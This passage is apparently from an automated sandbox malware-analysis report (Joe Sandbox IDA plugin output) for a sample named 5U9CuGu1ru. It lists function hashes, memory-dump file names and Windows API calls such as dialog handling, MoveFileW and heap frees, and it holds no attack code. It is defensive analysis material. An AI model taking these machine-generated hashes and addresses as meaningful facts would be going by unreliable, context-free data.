              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
              • Instruction ID: 28b2200bd084a1514f7cf154f7e712599ca1bbc8c0a277592d8090b5cddaeaab
              • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
              • Instruction Fuzzy Hash: FCC173362051730EDF6D8639953403FBAE2AAA17B131A076DD4B2CB1D6FE20D5A49E20
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9791f82708f0d1e971b52fd351b974e3d7d03ceda410749c9420d6e202177f6f
              • Instruction ID: 041aad1af62201cedd8608b6eab73773d6ab6ee54e19c5666de5ef6d58e2308a
              • Opcode Fuzzy Hash: 9791f82708f0d1e971b52fd351b974e3d7d03ceda410749c9420d6e202177f6f
              • Instruction Fuzzy Hash: 9BE125795183848FC304CF29D89096ABBF0BF9A300F89095EF5D597352D335EA19DBA2
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
              • Instruction ID: d6fabd5ef63648dc9fe21a4e5b77a86b64d75bcdbfab9085522161ae1a4d4e38
              • Opcode Fuzzy Hash: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
              • Instruction Fuzzy Hash: B79126B02047498BDB28EA68D891BFA77D9FF90304F10492DE597D72C2EA749684C792
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: be2aa93c8295b43c39d0affe9a39714845a7d734b71409ccfcebea2a3f7c59f5
              • Instruction ID: 6c334f7f4975d7f816d3cdbd7b26c0643efae195c455cd40baf8e30dd3c6bc06
              • Opcode Fuzzy Hash: be2aa93c8295b43c39d0affe9a39714845a7d734b71409ccfcebea2a3f7c59f5
              • Instruction Fuzzy Hash: A8618A7168073856DE38996CB855BBF2384FB45714F103A1AE883DB2D1D651DDC2C37A
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
              • Instruction ID: 5a6744dab2b1d42bd770ef28bf6a57d27c4b4c8f95d4bbcb13165a5d0d40c78b
              • Opcode Fuzzy Hash: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
              • Instruction Fuzzy Hash: B17105716043495BDB24DE28C8D0BED77E9FFA4308F00492DE9C6CB682DA749AC98752
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
              • Instruction ID: 1932e7184e74b81b9cb621352971264c2d4a461a90498c95592288000d4c4354
              • Opcode Fuzzy Hash: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
              • Instruction Fuzzy Hash: 1B516870610ABC6EDB34892CB855BBF67C9FB53304F182529E992DB282C325DDC59372
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 870418dc418b5a6830eed955e0cba4030a03571108b8057bf435a08d795afad6
              • Instruction ID: 41089e3df70a7580d38f1bb9abcc02559e4299792d6362dc618e4d8152cccdc3
              • Opcode Fuzzy Hash: 870418dc418b5a6830eed955e0cba4030a03571108b8057bf435a08d795afad6
              • Instruction Fuzzy Hash: 2B819E9521D6D49EC7568F7C3CA03BA3FA1B733340B1944BAC4C6C62A3D5764568D722
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: cdea74a856748e32d71362983ae628157455d9c3c3db987a3b6dcd5cc6f9433d
              • Instruction ID: d73e91d41714468c2cf2c35db13887cf30a7e143204960c5a90c4e0a13889380
              • Opcode Fuzzy Hash: cdea74a856748e32d71362983ae628157455d9c3c3db987a3b6dcd5cc6f9433d
              • Instruction Fuzzy Hash: 6551C0316083D54EC712CF28998456FBFE1FEEA314F494C9EE4E59B252D2209649CB93
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f4f4d0100f814ca1188dd6d6eeabe8d97e5a6dc1406602465c326374e3c2a2f0
              • Instruction ID: 8cff9f59a17f86fe0c46c1b404ff9de36445580df5b9ce090040cc2ec676b09e
              • Opcode Fuzzy Hash: f4f4d0100f814ca1188dd6d6eeabe8d97e5a6dc1406602465c326374e3c2a2f0
              • Instruction Fuzzy Hash: 27513571A083158BC748CF19D88055AF7E1FFC8354F058A2EE889E3741DB34E959CB96
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
              • Instruction ID: 9ded4da858d50311e981399739cca3e20443195d28147e113995fcb8e4aa5933
              • Opcode Fuzzy Hash: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
              • Instruction Fuzzy Hash: 5031E5B16047498FCB14DF28C8512AABBE4FF95310F10892DE4E5C7782C735EA89CB92
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f05d7d1f48a99974d707d0af9517929f17a885840a44ccb0d617c5d85aa25721
              • Instruction ID: 742946792813b1273fc1804af36a2368211358aa4c470e2f7c2e87f817d5c14b
              • Opcode Fuzzy Hash: f05d7d1f48a99974d707d0af9517929f17a885840a44ccb0d617c5d85aa25721
              • Instruction Fuzzy Hash: 0A21B332A255764BCB88CE2DDC9083B7765F786311746812BEB46DB2E1C538E925CBE0
              APIs
              • _swprintf.LIBCMT ref: 0080DABE
                • Part of subcall function 0080400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0080401D
                • Part of subcall function 00811596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00840EE8,00000200,0080D202,00000000,?,00000050,00840EE8), ref: 008115B3
              • _strlen.LIBCMT ref: 0080DADF
              • SetDlgItemTextW.USER32(?,0083E154,?), ref: 0080DB3F
              • GetWindowRect.USER32(?,?), ref: 0080DB79
              • GetClientRect.USER32(?,?), ref: 0080DB85
              • GetWindowLongW.USER32(?,000000F0), ref: 0080DC25
              • GetWindowRect.USER32(?,?), ref: 0080DC52
              • SetWindowTextW.USER32(?,?), ref: 0080DC95
              • GetSystemMetrics.USER32(00000008), ref: 0080DC9D
              • GetWindow.USER32(?,00000005), ref: 0080DCA8
              • GetWindowRect.USER32(00000000,?), ref: 0080DCD5
              • GetWindow.USER32(00000000,00000002), ref: 0080DD47
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
              • String ID: $%s:$CAPTION$d
              • API String ID: 2407758923-2512411981
              • Opcode ID: 410c33fcf34116a6a6e8a67e206fe9f4b03ac7a0e7e77eb794592807dda1c570
              • Instruction ID: b7816474866ade32366dbcf40f673235879644bd4bec64390fa4577c3b7ac734
              • Opcode Fuzzy Hash: 410c33fcf34116a6a6e8a67e206fe9f4b03ac7a0e7e77eb794592807dda1c570
              • Instruction Fuzzy Hash: 7B819172108701AFD750DFA8CD89A6BBBE9FBC9704F05191DFA84E3291D670E909CB52
              APIs
              • ___free_lconv_mon.LIBCMT ref: 0082C277
                • Part of subcall function 0082BE12: _free.LIBCMT ref: 0082BE2F
                • Part of subcall function 0082BE12: _free.LIBCMT ref: 0082BE41
                • Part of subcall function 0082BE12: _free.LIBCMT ref: 0082BE53
                • Part of subcall function 0082BE12: _free.LIBCMT ref: 0082BE65
                • Part of subcall function 0082BE12: _free.LIBCMT ref: 0082BE77
                • Part of subcall function 0082BE12: _free.LIBCMT ref: 0082BE89
                • Part of subcall function 0082BE12: _free.LIBCMT ref: 0082BE9B
                • Part of subcall function 0082BE12: _free.LIBCMT ref: 0082BEAD
                • Part of subcall function 0082BE12: _free.LIBCMT ref: 0082BEBF
                • Part of subcall function 0082BE12: _free.LIBCMT ref: 0082BED1
                • Part of subcall function 0082BE12: _free.LIBCMT ref: 0082BEE3
                • Part of subcall function 0082BE12: _free.LIBCMT ref: 0082BEF5
                • Part of subcall function 0082BE12: _free.LIBCMT ref: 0082BF07
              • _free.LIBCMT ref: 0082C26C
                • Part of subcall function 008284DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0082BFA7,00833958,00000000,00833958,00000000,?,0082BFCE,00833958,00000007,00833958,?,0082C3CB,00833958), ref: 008284F4
                • Part of subcall function 008284DE: GetLastError.KERNEL32(00833958,?,0082BFA7,00833958,00000000,00833958,00000000,?,0082BFCE,00833958,00000007,00833958,?,0082C3CB,00833958,00833958), ref: 00828506
              • _free.LIBCMT ref: 0082C28E
              • _free.LIBCMT ref: 0082C2A3
              • _free.LIBCMT ref: 0082C2AE
              • _free.LIBCMT ref: 0082C2D0
              • _free.LIBCMT ref: 0082C2E3
              • _free.LIBCMT ref: 0082C2F1
              • _free.LIBCMT ref: 0082C2FC
              • _free.LIBCMT ref: 0082C334
              • _free.LIBCMT ref: 0082C33B
              • _free.LIBCMT ref: 0082C358
              • _free.LIBCMT ref: 0082C370
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
              • String ID:
              • API String ID: 161543041-0
              • Opcode ID: 217796220b4a36a2206e66724421c945646a6ae27836c3e71019ca45c8060ffc
              • Instruction ID: 8efc9efa34debb734e11856f8809a6b0302150d1fff877c979894979baa84fa3
              • Opcode Fuzzy Hash: 217796220b4a36a2206e66724421c945646a6ae27836c3e71019ca45c8060ffc
              • Instruction Fuzzy Hash: 30316B32601225DFEF20AA7CF945B6A77E9FF00310F1488A9E449DB691DF31ACC08B65
              APIs
              • GetWindow.USER32(?,00000005), ref: 0081CD51
              • GetClassNameW.USER32(00000000,?,00000800), ref: 0081CD7D
                • Part of subcall function 008117AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0080BB05,00000000,.exe,?,?,00000800,?,?,008185DF,?), ref: 008117C2
              • GetWindowLongW.USER32(00000000,000000F0), ref: 0081CD99
              • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0081CDB0
              • GetObjectW.GDI32(00000000,00000018,?), ref: 0081CDC4
              • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0081CDED
              • DeleteObject.GDI32(00000000), ref: 0081CDF4
              • GetWindow.USER32(00000000,00000002), ref: 0081CDFD
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
              • String ID: STATIC
              • API String ID: 3820355801-1882779555
              • Opcode ID: fbd688e77f37a7869a5cc620a9b7fa4d16eb8f9ff874ed5a104b0d73bce39d92
              • Instruction ID: a1cf5b2183df7e603242f21df0f8104f2a96111d0b01c1ca3c9976cd93e54a42
              • Opcode Fuzzy Hash: fbd688e77f37a7869a5cc620a9b7fa4d16eb8f9ff874ed5a104b0d73bce39d92
              • Instruction Fuzzy Hash: DF115932184B20BBE3306B34EC0AFEF765CFF45740F014420FA42E10D2CAA4899686B3
              APIs
              • _free.LIBCMT ref: 00828EC5
                • Part of subcall function 008284DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0082BFA7,00833958,00000000,00833958,00000000,?,0082BFCE,00833958,00000007,00833958,?,0082C3CB,00833958), ref: 008284F4
                • Part of subcall function 008284DE: GetLastError.KERNEL32(00833958,?,0082BFA7,00833958,00000000,00833958,00000000,?,0082BFCE,00833958,00000007,00833958,?,0082C3CB,00833958,00833958), ref: 00828506
              • _free.LIBCMT ref: 00828ED1
              • _free.LIBCMT ref: 00828EDC
              • _free.LIBCMT ref: 00828EE7
              • _free.LIBCMT ref: 00828EF2
              • _free.LIBCMT ref: 00828EFD
              • _free.LIBCMT ref: 00828F08
              • _free.LIBCMT ref: 00828F13
              • _free.LIBCMT ref: 00828F1E
              • _free.LIBCMT ref: 00828F2C
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: 0e939941efef4c597e7ca3d97ad213524306c0207e4271eec4ae99a7552ca64d
              • Instruction ID: 66fd738d67fa70f2992169d8bc80442bcf208c4057f8930814a159322fa34c0d
              • Opcode Fuzzy Hash: 0e939941efef4c597e7ca3d97ad213524306c0207e4271eec4ae99a7552ca64d
              • Instruction Fuzzy Hash: 9611A47650111DFFCF11FF98E842CDA3BA5FF04350B5140E5BA088B626DA31DA919F86
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID:
              • String ID: ;%u$x%u$xc%u
              • API String ID: 0-2277559157
              • Opcode ID: 87b4e430245b1d99bb6edd94b71019f9261a734a8e34c696be37d482298edf0b
              • Instruction ID: ff43c2b88ecdfaa35fe8ae59c09beb72e83dea10b6b4bccdea7d6ddf76acbc1b
              • Opcode Fuzzy Hash: 87b4e430245b1d99bb6edd94b71019f9261a734a8e34c696be37d482298edf0b
              • Instruction Fuzzy Hash: 14F118716042405BDBA5EF388C99BEE7799FFA1300F08056DF985CB2C3DAA59844C7A3
              APIs
                • Part of subcall function 0080130B: GetDlgItem.USER32(00000000,00003021), ref: 0080134F
                • Part of subcall function 0080130B: SetWindowTextW.USER32(00000000,008335B4), ref: 00801365
              • EndDialog.USER32(?,00000001), ref: 0081AD20
              • SendMessageW.USER32(?,00000080,00000001,?), ref: 0081AD47
              • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0081AD60
              • SetWindowTextW.USER32(?,?), ref: 0081AD71
              • GetDlgItem.USER32(?,00000065), ref: 0081AD7A
              • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0081AD8E
              • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0081ADA4
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: MessageSend$Item$TextWindow$Dialog
              • String ID: LICENSEDLG
              • API String ID: 3214253823-2177901306
              • Opcode ID: 362c844008482fa0dd1e5ee9119073ea5a9f69762b3d7bda4915b139569048cd
              • Instruction ID: e4a6a26a659079e8f424d1339f5f27beec17a223bebf9983a0c11bd3cfb12906
              • Opcode Fuzzy Hash: 362c844008482fa0dd1e5ee9119073ea5a9f69762b3d7bda4915b139569048cd
              • Instruction Fuzzy Hash: E721E531245A05BBD2295F75FD49EBB3B6DFF46B46F020054F604E24A0DBA6AD80D633
              APIs
              • __EH_prolog.LIBCMT ref: 00809448
              • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 0080946B
              • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 0080948A
                • Part of subcall function 008117AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0080BB05,00000000,.exe,?,?,00000800,?,?,008185DF,?), ref: 008117C2
              • _swprintf.LIBCMT ref: 00809526
                • Part of subcall function 0080400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0080401D
              • MoveFileW.KERNEL32(?,?), ref: 00809595
              • MoveFileW.KERNEL32(?,?), ref: 008095D5
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
